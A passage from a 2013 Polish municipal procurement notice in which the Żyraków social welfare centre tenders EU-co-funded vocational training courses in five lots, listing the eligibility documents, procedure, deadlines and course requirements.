2) wykaz z co najmniej 1 wykonaną, a w przypadku świadczenia okresowego lub ciągłego również wykonywaną, główną usługę związaną z przeprowadzeniem szkolenia do zawodu opiekuna osób starszych i niepełnosprawnych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem jej wartości, przedmiotu, dat wykonania i podmiotu, na rzecz którego usługa została wykonana oraz załączeniem dowodów, czy została wykonana lub jest wykonywana należycie - wg wzoru na załączniku nr 4 do SIWZ.

W przypadku składania oferty na część V zamówienia:
1) oświadczenie o spełnianiu warunków udziału w postępowaniu wg wzoru na załączniku nr 2 do SIWZ,
2) wykaz z co najmniej 1 wykonaną, a w przypadku świadczenia okresowego lub ciągłego również wykonywaną, główną usługę związaną z przeprowadzeniem szkolenia do zawodu pracownik robót wykończeniowych w budownictwie, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem jej wartości, przedmiotu, dat wykonania i podmiotu, na rzecz którego usługa została wykonana oraz załączeniem dowodów, czy została wykonana lub jest wykonywana należycie - wg wzoru na załączniku nr 4 do SIWZ.

(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, Wykonawcy są zobowiązani dołączyć do oferty jedno wspólne oświadczenie na załączniku nr 2 podpisane przez każdego z nich oraz jeden wspólny wykaz na załączniku nr 4 do SIWZ wraz z dowodem określającym, czy usługa została wykonana lub jest wykonywana w sposób należyty. W przypadku składania oferty na kilka lub na wszystkie części zamówienia do oferty należy załączyć jeden wykaz uwzględniający wymagane usługi dla poszczególnych części zamówienia).

Za dowód uważa się poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. W przypadku usług Zamawiający za dowód uzna oświadczenie wykonawcy jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.

UWAGA: W postępowaniach o udzielenie zamówienia publicznego wszczynanych w okresie 12 miesięcy od dnia wejścia w życie Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane tj. od 20 lutego 2013r. wykonawca w miejsce poświadczeń może przedkładać dokumenty potwierdzające należyte wykonanie usług, określone w § 1 ust. 1 pkt 2 i 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia jest spełniony jeżeli Wykonawca przedłoży oświadczenie o spełnianiu warunków udziału w postępowaniu wg wzoru na załączniku nr 2 do SIWZ,
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, Wykonawcy są zobowiązani dołączyć do oferty jedno wspólne oświadczenie na załączniku nr 2 podpisane przez każdego z nich).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia jest spełniony, jeżeli Wykonawca przedłoży:
1) oświadczenie o spełnianiu warunków udziału w postępowaniu wg wzoru na załączniku nr 2 do SIWZ, 
2) oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia do realizacji zamówienia wg wzoru na załączniku nr 5 do SIWZ.
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, do oferty należy dołączyć jedno wspólne oświadczenie na załączniku nr 2 oraz jedno oświadczenie na załączniku nr 5 do SIWZ podpisane przez każdego z nich).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek posiadania odpowiedniej sytuacji ekonomicznej i finansowej do wykonania zamówienia jest spełniony, jeżeli Wykonawca przedłoży oświadczenie o spełnianiu warunków udziału w postępowaniu wg wzoru na załączniku nr 2 do SIWZ, 
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, do oferty należy dołączyć jedno wspólne oświadczenie na załączniku nr 2 podpisane przez każdego z nich).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy
2. Stosowne pełnomocnictwa (jeżeli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się dokonywanie wszelkich zmian w umowie z Wykonawcą jeżeli konieczność ich wprowadzenia jest spowodowana warunkami umowy o dofinansowanie projektu PO KL.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gopszyrakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Żyrakowie, 39-204 Żyraków 137.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2013 godzina 09:50, miejsce: Urząd Gminy w Żyrakowie, 39-204 Żyraków  137, pokój nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowanie w ramach PO KL 2007-2013, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie zajęć doradztwa zawodowego i treningu kompetencji społecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie zajęć doradztwa zawodowego:
- miejsce przeprowadzenia szkolenia: Dębica, Żyraków lub okolice m. Żyraków w odległości nie większej niż 5 km,
- Wykonawca zapewni pomieszczenia dostosowane do przeprowadzenia zajęć,
- ilość godzin: 40 (w tym: 10 godz. zajęć grupowych oraz po 2 godz./osobę zajęć indywidualnych tj. łącznie 30 godz. zajęć indywidualnych) 
- ilość uczestników: 15 osób,
- maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin dydaktycznych,
- zajęcia w trybie dziennym,
- zajęcia muszą odpowiadać obowiązującym przepisom,
- celem zajęć będzie dostarczenie wiedzy i umiejętności z zakresu efektywnego poszukiwania pracy, sporządzania podstawowych dokumentów, autoanaliza mocnych i słabych stron pod kątem poszukiwania pracy,
- w ramach zajęć teoretycznych Wykonawca zapewni: wykładowcę, podręczniki, skrypty, materiały piśmienno-biurowe oraz wszelkie inne środki dydaktyczne niezbędne do ich realizacji przedmiotu zamówienia,
- Wykonawca zapewni taką ilość materiałów do zajęć teoretycznych, która pozwoli na ich prawidłowe przeprowadzenie,
- Wykonawca poprowadzi dokumentację z przebiegu zajęć, którą stanowić będą: program nauczania, dziennik zajęć zawierający imienną listę obecności podpisaną przez kursantów długopisem koloru niebieskiego, wymiar godzin i tematy zajęć,
- w związku z finansowaniem szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Zamawiający wymaga oznakowania miejsc szkoleń, wszelkich druków, dokumentów i zaświadczeń zgodnie z WYTYCZNYMI DOTYCZĄCYMI OZNACZANIA PROJEKTÓW W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI  z 4 lutego 2009r.,
- przed rozpoczęciem kursu Wykonawca przedstawi Zamawiającemu do akceptacji program szkolenia, który musi być zgodny z obowiązującymi przepisami,
- Wykonawca zapewni jeden ciepły posiłek w każdym dniu szkolenia składający się z zupy i drugiego dania oraz napoje: kawę, herbatę, wodę mineralną,
- termin realizacji: 21 dni od podpisania umowy.

Przeprowadzenie treningu kompetencji społecznych:
- miejsce przeprowadzenia szkolenia: Dębica, Żyraków lub okolice m. Żyraków w odległości nie większej niż 5 km,
- Wykonawca zapewni pomieszczenia dostosowane do przeprowadzenia zajęć
- ilość godzin: 25 (zajęcia grupowe)
- ilość uczestników: 15 osób,
- maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin dydaktycznych,
- zajęcia w trybie dziennym,
- zajęcia muszą odpowiadać obowiązującym przepisom,
- celem zajęć będzie nabycie przez kursantów wiedzy i umiejętności z zakresu komunikacji interpersonalnej, asertywności, sposobów rozwiązywania konfliktów i radzenia sobie w trudnych sytuacjach oraz efektywnego zarządzania budżetem domowym,
- w ramach zajęć Wykonawca zapewni: wykładowcę, podręczniki, skrypty, materiały piśmienno-biurowe, oraz wszelkie inne środki dydaktyczne niezbędne do ich realizacji.
- Wykonawca zapewni taką ilość materiałów do zajęć teoretycznych, która pozwoli na ich prawidłowe przeprowadzenie,
- Wykonawca poprowadzi dokumentację z przebiegu zajęć, którą stanowić będą: program nauczania, dziennik zajęć zawierający imienną listę obecności podpisaną przez kursantów długopisem koloru niebieskiego, wymiar godzin i tematy zajęć,
- w związku z finansowaniem szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Zamawiający wymaga oznakowania miejsc szkoleń, wszelkich druków, dokumentów 
i zaświadczeń zgodnie z WYTYCZNYMI DOTYCZĄCYMI OZNACZANIA PROJEKTÓW W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI  z 4 lutego 2009r.,
- przed rozpoczęciem kursu Wykonawca przedstawi Zamawiającemu do akceptacji program szkolenia, który musi być zgodny z obowiązującymi przepisami,
- Wykonawca zapewni jeden ciepły posiłek w każdym dniu szkolenia składający się z zupy i drugiego dania oraz napoje: kawę, herbatę, wodę mineralną,
- termin realizacji: 21 dni od podpisania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Doświadczenie - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie szkolenia - Przedstawiciel handlowy z kursem prawa jazdy kat. B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - miejsce przeprowadzenia szkolenia: Dębica, Żyraków lub okolice m. Żyraków w odległości nie większej niż 5 km,
- Wykonawca zapewni pomieszczenia dostosowane do przeprowadzenia szkolenia,
- ilość godzin teorii: minimum zgodnie z obowiązującymi przepisami,
- ilość godzin praktyki: minimum zgodnie z obowiązującymi przepisami,
- łączna planowana ilość godzin: 140,
- ilość uczestników: 4 osoby,
- maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin dydaktycznych,
- szkolenie w trybie dziennym,
- szkolenie musi odpowiadać obowiązującym przepisom,
- w ramach szkolenia Wykonawca musi zaznajomić uczestników kursu z zagadnieniami przepisów BHP,
- tematyka szkolenia winna być związana z podstawowymi zadaniami przedstawiciela handlowego, profesjonalną obsługą klienta, profesjonalną prezentacją handlową, metodami pozyskiwania klientów,  technikami sprzedaży, promocją  w handlu,
- szkolenie obejmuje przeprowadzenie kursu przygotowującego do egzaminu na prawo jazdy kat. B,
- kurs musi kończyć się egzaminem z części teoretycznej i praktycznej oraz wydaniem zaświadczenia na druku Ministerstwa Edukacji Narodowej o ukończeniu kursu i uprawnieniami do wykonywania zawodu,
- Wykonawca zapewni ubezpieczenie każdego uczestnika kursu w niezbędnym zakresie, czego potwierdzeniem będzie przekazanie kopii polisy ubezpieczeniowej Zamawiającemu przed rozpoczęciem zajęć,
- w ramach zajęć teoretycznych kursu przyuczającego do zawodu Wykonawca zapewni: wykładowcę, podręczniki, skrypty, materiały piśmienno-biurowe oraz wszelkie inne środki dydaktyczne niezbędne do realizacji szkolenia,
- Wykonawca w zakresie zajęć praktycznych zapewni: instruktorów nauki zawodu, instruktorów jazdy, urządzenia i materiały do zajęć praktycznych,
- Wykonawca zapewni taką ilość materiałów do zajęć teoretycznych i praktycznych, która pozwoli na ich prawidłowe przeprowadzenie,
- Wykonawca poprowadzi dokumentację z przebiegu szkolenia, którą stanowić będą: program nauczania, dziennik zajęć edukacyjnych zawierający imienną listę obecności podpisaną przez kursantów długopisem koloru niebieskiego, wymiar godzin zajęć edukacyjnych i tematy zajęć edukacyjnych, rejestr wydanych zaświadczeń z potwierdzonym odbiorem przez kursantów,
- w związku z finansowaniem szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Zamawiający wymaga oznakowania miejsc szkoleń, wszelkich druków, dokumentów i zaświadczeń zgodnie z WYTYCZNYMI DOTYCZĄCYMI OZNACZANIA PROJEKTÓW W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI  z 4 lutego 2009r.,
- przed rozpoczęciem kursu Wykonawca przedstawi Zamawiającemu do akceptacji program szkolenia, który musi być zgodny z Rozporządzeniem Ministra Edukacji i Nauki z 3 lutego 2006r. w sprawie uzyskiwania 
i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216),
- Wykonawca zapewni badania lekarskie osobie biorącej udział w szkoleniu,
- Wykonawca zapewni jeden ciepły posiłek w każdym dniu szkolenia składający się z zupy i drugiego dania oraz napoje: kawę, herbatę, wodę mineralną,
- termin realizacji: rozpoczęcie nie wcześniej niż po zakończeniu zajęć objętych I częścią zamówienia; zakończenie do 20.12.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Doświadczenie - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przeprowadzenie szkolenia - Sprzedawca z obsługą kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - miejsce przeprowadzenia szkolenia: Dębica, Żyraków lub okolice m. Żyraków w odległości nie większej niż 5 km,
- Wykonawca zapewni pomieszczenia dostosowane do przeprowadzenia szkolenia,
- ilość godzin teorii: minimum zgodnie z obowiązującymi przepisami,
- ilość godzin praktyki: minimum zgodnie z obowiązującymi przepisami,
- łączna planowana ilość godzin: 67,
- ilość uczestników: 5 osób,
- maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin dydaktycznych,
- szkolenie w trybie dziennym,
- szkolenie musi odpowiadać obowiązującym przepisom,
- w ramach szkolenia Wykonawca zaznajomi uczestników szkolenia z obsługą kasy fiskalnej, technikami sprzedaży detalicznej, organizacją pracy w sklepie oraz czynnościami rachunkowo-kasowymi,
- w ramach szkolenia Wykonawca musi zaznajomić uczestników kursu z zagadnieniami przepisów BHP,
- kurs musi kończyć się egzaminem oraz wydaniem zaświadczenia na druku Ministerstwa Edukacji Narodowej o ukończeniu kursu, uprawnieniami do wykonywania zawodu, 
- Wykonawca zapewni ubezpieczenie każdego uczestnika kursu w niezbędnym zakresie, czego potwierdzeniem będzie przekazanie kopii polis ubezpieczeniowych Zamawiającemu przed rozpoczęciem zajęć,
- w ramach zajęć teoretycznych kursu przyuczającego do zawodu Wykonawca zapewni: wykładowcę, podręczniki, skrypty, materiały piśmienno-biurowe oraz wszelkie inne środki dydaktyczne niezbędne do realizacji szkolenia,
- Wykonawca w zakresie zajęć praktycznych zapewni: instruktorów nauki zawodu, urządzenia, materiały do zajęć praktycznych, odzież roboczą i środki ochrony indywidualnej,
- Wykonawca zapewni taką ilość materiałów do zajęć teoretycznych i praktycznych, która pozwoli na ich prawidłowe przeprowadzenie,
- Wykonawca poprowadzi dokumentację z przebiegu szkolenia, którą stanowić będą: program nauczania, dziennik zajęć edukacyjnych zawierający imienną listę obecności podpisaną przez kursantów długopisem koloru niebieskiego, wymiar godzin zajęć edukacyjnych i tematy zajęć edukacyjnych, rejestr wydanych zaświadczeń z potwierdzonym odbiorem przez kursantów,
- w związku z finansowaniem szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Zamawiający wymaga oznakowania miejsc szkoleń, wszelkich druków, dokumentów i zaświadczeń zgodnie z WYTYCZNYMI DOTYCZĄCYMI OZNACZANIA PROJEKTÓW W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI  z 4 lutego 2009r.,
- przed rozpoczęciem kursu Wykonawca przedstawi Zamawiającemu do akceptacji program szkolenia, który musi być zgodny z Rozporządzeniem Ministra Edukacji i Nauki z 3 lutego 2006r. w sprawie uzyskiwania                 i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216),
- Wykonawca zapewni jeden ciepły posiłek w każdym dniu szkolenia składający się z zupy i drugiego dania oraz napoje: kawę, herbatę, wodę mineralną,
- termin realizacji: rozpoczęcie nie wcześniej niż po zakończeniu zajęć objętych I częścią zamówienia; zakończenie do 20.09.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Doświadczenie - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przeprowadzenie szkolenia - Opiekun osób starszych i niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - miejsce przeprowadzenia szkolenia: Dębica, Żyraków lub okolice m. Żyraków w odległości nie większej niż 5 km,
- Wykonawca zapewni pomieszczenia dostosowane do przeprowadzenia szkolenia,
- ilość godzin teorii: minimum zgodnie z obowiązującymi przepisami,
- ilość godzin praktyki: minimum zgodnie z obowiązującymi przepisami,
- łączna planowana ilość godzin: 90,
- ilość uczestników: 4 osób,
- maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin dydaktycznych,
- szkolenie w trybie dziennym,
- szkolenie musi odpowiadać obowiązującym przepisom,
- w ramach szkolenia Wykonawca zaznajomi kursantów z tematyką pielęgnacji osób starszych oraz przewlekle chorych, z zasadami udzielania pierwszej pomocy przedlekarskiej, zasadami żywienia, rodzajami diet, podstawowymi zagadnieniami z psychologii osób starszych, organizacją czasu wolnego osób starszych, komunikacją interpersonalną oraz pomocą społeczną i współpracą ze środowiskiem,
- Wykonawca zapewni ubezpieczenie każdego uczestnika kursu w niezbędnym zakresie, czego potwierdzeniem będzie przekazanie kopii polis ubezpieczeniowych Zamawiającemu przed rozpoczęciem zajęć,
- w ramach zajęć teoretycznych kursu przyuczającego do zawodu Wykonawca zapewni: wykładowcę, podręczniki, skrypty, materiały piśmienno-biurowe oraz wszelkie inne środki dydaktyczne niezbędne do realizacji szkolenia,
- Wykonawca w zakresie zajęć praktycznych zapewni: instruktorów, urządzenia, materiały do zajęć,
- Wykonawca zapewni taką ilość materiałów do zajęć teoretycznych i praktycznych, która pozwoli na ich prawidłowe przeprowadzenie,
- Wykonawca poprowadzi dokumentację z przebiegu szkolenia, którą stanowić będą: program nauczania, dziennik zajęć edukacyjnych zawierający imienną listę obecności podpisaną przez kursantów długopisem koloru niebieskiego, wymiar godzin zajęć edukacyjnych i tematy zajęć edukacyjnych, rejestr wydanych zaświadczeń z potwierdzonym odbiorem przez kursantów,
- w związku z finansowaniem szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Zamawiający wymaga oznakowania miejsc szkoleń, wszelkich druków, dokumentów i zaświadczeń zgodnie z WYTYCZNYMI DOTYCZĄCYMI OZNACZANIA PROJEKTÓW W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI  z 4 lutego 2009r.,
- przed rozpoczęciem kursu Wykonawca przedstawi Zamawiającemu do akceptacji program szkolenia, który musi być zgodny z Rozporządzeniem Ministra Edukacji i Nauki z 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216),
- Wykonawca zapewni jeden ciepły posiłek w każdym dniu szkolenia składający się z zupy i drugiego dania oraz napoje: kawę, herbatę, wodę mineralną
- termin realizacji: rozpoczęcie nie wcześniej niż po zakończeniu zajęć objętych I częścią zamówienia; zakończenie do 20.12.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Doświadczenie - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przeprowadzenie szkolenia - Pracownik robót wykończeniowych w budownictwie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - miejsce przeprowadzenia szkolenia: Dębica, Żyraków lub okolice m. Żyraków w odległości nie większej niż 5 km,
- Wykonawca zapewni pomieszczenia dostosowane do przeprowadzenia szkolenia,
- ilość godzin teorii: minimum zgodnie z obowiązującymi przepisami,
- ilość godzin praktyki: minimum zgodnie z obowiązującymi przepisami,
- łączna ilość godzin: 170,
- ilość uczestników: 2 osoby,
- maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin dydaktycznych,
- szkolenie w trybie dziennym,
- szkolenie musi odpowiadać obowiązującym przepisom,
- w ramach szkolenia Wykonawca zaznajomi kursantów z tematyką 
- w ramach szkolenia Wykonawca musi zaznajomić uczestników kursu z zagadnieniami przepisów BHP,
- kurs musi kończyć się egzaminem z części teoretycznej i praktycznej oraz wydaniem zaświadczenia na druku Ministerstwa Edukacji Narodowej o ukończeniu kursu i uprawnieniami do wykonywania zawodu pracownika robót wykończeniowych w budownictwie,
- Wykonawca zapewni ubezpieczenie w niezbędnym zakresie (OC, NW) każdego uczestnika kursu, czego potwierdzeniem będzie przekazanie kopii polis ubezpieczeniowych Zamawiającemu przed rozpoczęciem zajęć,
- w ramach zajęć teoretycznych kursu przyuczającego do zawodu Wykonawca zapewni: wykładowcę, podręczniki, skrypty, materiały piśmienno-biurowe, środki dydaktyczne niezbędne do realizacji szkolenia,
- Wykonawca w zakresie zajęć praktycznych zapewni: instruktorów nauki zawodu, urządzenia, materiały do zajęć praktycznych, odzież roboczą i środki ochrony indywidualnej,
- Wykonawca zapewni taką ilość materiałów do zajęć teoretycznych i praktycznych, która pozwoli na ich prawidłowe przeprowadzenie,
- Wykonawca poprowadzi dokumentację z przebiegu szkolenia, którą stanowić będą: program nauczania, dziennik zajęć edukacyjnych zawierający imienną listę obecności podpisaną przez kursantów długopisem koloru niebieskiego, wymiar godzin zajęć edukacyjnych i tematy zajęć edukacyjnych, rejestr wydanych zaświadczeń z potwierdzonym odbiorem przez kursantów,
- w związku z finansowaniem szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Zamawiający wymaga oznakowania miejsc szkoleń, wszelkich druków, dokumentów i zaświadczeń zgodnie z WYTYCZNYMI DOTYCZĄCYMI OZNACZANIA PROJEKTÓW W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI  z 4 lutego 2009r.,
- przed rozpoczęciem kursu Wykonawca przedstawi Zamawiającemu do akceptacji program szkolenia, który musi być zgodny z Rozporządzeniem Ministra Edukacji i Nauki z 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216),
